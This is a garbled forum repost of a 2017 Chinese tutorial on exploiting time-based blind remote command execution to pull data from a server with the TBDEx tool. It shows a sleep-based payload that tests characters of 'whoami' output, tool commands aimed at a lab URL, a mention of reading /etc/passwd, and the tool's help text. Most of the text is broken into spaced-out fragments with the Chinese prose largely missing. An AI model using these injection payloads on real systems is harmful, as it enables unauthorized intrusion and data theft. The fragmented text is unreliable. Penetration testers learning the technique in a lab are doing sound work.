搜索

[11156] 2017-03-22_渗透测试中利用基于时间差反馈的远程代码执行漏洞(TimedBasedRCE)进行数据获取

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2017-03-22_渗透测试中利用基于时间差反馈的远程代码执行漏洞(TimedBasedRCE)进行数据获取 T i m e d   B a s e d   R C E c l o u d s   F r e e B u f   2 0 1 7 - 0 3 - 2 2 O S   c o m m a n d   i n j e c t i o n   t i m e   b a s e d   G i t H u b - T B D E x A P I 访 A P I G E T   r e q u e s t I D f u z z i n g S Q L s l e e p   1 0 H T T P   r e s p o n s e 1 0 A P I A P I P a y l o a d H T T P A P I W i n d o w s p a y l o a d B a s h P o w e r S h e l l B a s h P o w e r S h e l l l i n u x s l e e p t i m e   i f l i n u x t i m e ( r e a l   t i m e ) ( u s e r   t i m e ) ( s y s   t i m e )
n c a t w g e t c u r l F T P     D N S I C M P s l e e p t i m e - b a s e d S Q L : r o o t w h o a m i   |   c u t   - c   1   = =   r   r o o t r 5 s l e e p   5 r o o t L i n u x c u t - b   - c   c u t   - c   1   1 - d   t i m e   i f   [   $ w h o a m i   |   c u t   - c   1   = =   r ] ;   t h e n   s l e e p   5 ;   f i
- f     - d 使 - n   P a y l o a d G E T 4 8   p a y l o a d 4 8 c u t t i m e 使 p a y l o a d 4 8 p a y l o a d 9 p y t h o n T B D E x T i m e   B a s e d   D a t a   E x f i l t r a t i o n   T o o l A S C I I C o m m i x ? C o m m i x T i m e - b a s e d C o m m i x C o m m i x p a y l o a d C o m m i x w h o a m i T B D E x 使 使 l e n g t h . p y l e n g t h . b a t a s c i i . p y a s c i i . b a t A S C I I t i m e b a s e d . p y
l e n g t h . p y l e n g t h . b a t A S C I I 1 .   0 ?   :   p y t h o n   l . p y   0   0   0   4           = > 2 . 1 0 ? :   p y t h o n   l . p y   1 0   0   0   4         = > 4 3 . 1 0 ? :   p y t h o n   l . p y   1 0   1   0   4                       = > 4 . 9   p y t h o n   l . p y   9   1   0   4                     = >   4 A S C I I p y t h o n   a s c i i . p y   { C H A R _ P O S }   { A S C I I _ V A L U E }   { I S _ G R E A T E R }   { W H E R E _ T H E _ O U T P U T _ I S _ A T }   { T I M E _ D E L A Y } p y t h o n   t i m b e s e d . p y   - u r l   h t t p : / / 1 9 2 . 1 6 8 . 2 0 7 . 1 2 8 / m l . p h p ? c = % h e r e %   - p a y l o a d _ l i m i t   4 8   - t m p
u n a m e   - a :
2 8 6 3 / e t c / p a s s w o r d h t t p : / / 1 9 2 . 1 6 8 . 2 0 7 . 1 2 8 / m l . p h p m l . p h p
T B D E x p y c u r l p i p   i n s t a l l   p y c u r l a p t - g e t   i n s t a l l   p y c u r l a p t - g e t   i n s t a l l   p y t h o n - p y c u r l T B D E x 使 使     - h ,   h e l p                         s h o w   t h i s   h e l p   m e s s a g e   a n d   e x i t     - u r l   U R L                             U R L     - p o s t   P O S T                         P O S T     - t h r e a d s   T H R E A D S                   T h r e a d s     - c o o k i e   C O O K I E   F I L E             C o o k i e   F i l e     - f i l e   H E A D E R   F I L E                 B u r p   r e q u e s t   f i l e     - r e t r y   R E T R Y                           R e t r y   r e q u e s t   N   t i m e s   i n   c a s e   o f   n e t w o r k   e r r o r s     - t i m e o u t   T I M E O U T                   G e n e r a l   t i m e o u t   r e q u e s t     - t i m e   A V G T I M E                         A d d e d   t i m e o u t   t o   r e q u e s t     - o s   O S                                       O S   t y p e   ( U   u n i x / l i n u x   ,   W   w i n d o w s )     - p a y l o a d   l i m i t   L I M I T           I f   t h e r e   i s   a n y   c o m m a n d   l e n g t h   l i m i t a t i o n     - f o r c e   w r i t e                           F o r c e   w r i t i n g   a u x i l i a r y   f i l e s     - t m p                                           W r i t i n g   a u x i l i a r y   f i l e s   i n   t m p   f o l d e r T B D E x G i t h u b * s e c u r i t y c a f e F B c l o u d s F r e e B u f . C O M

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理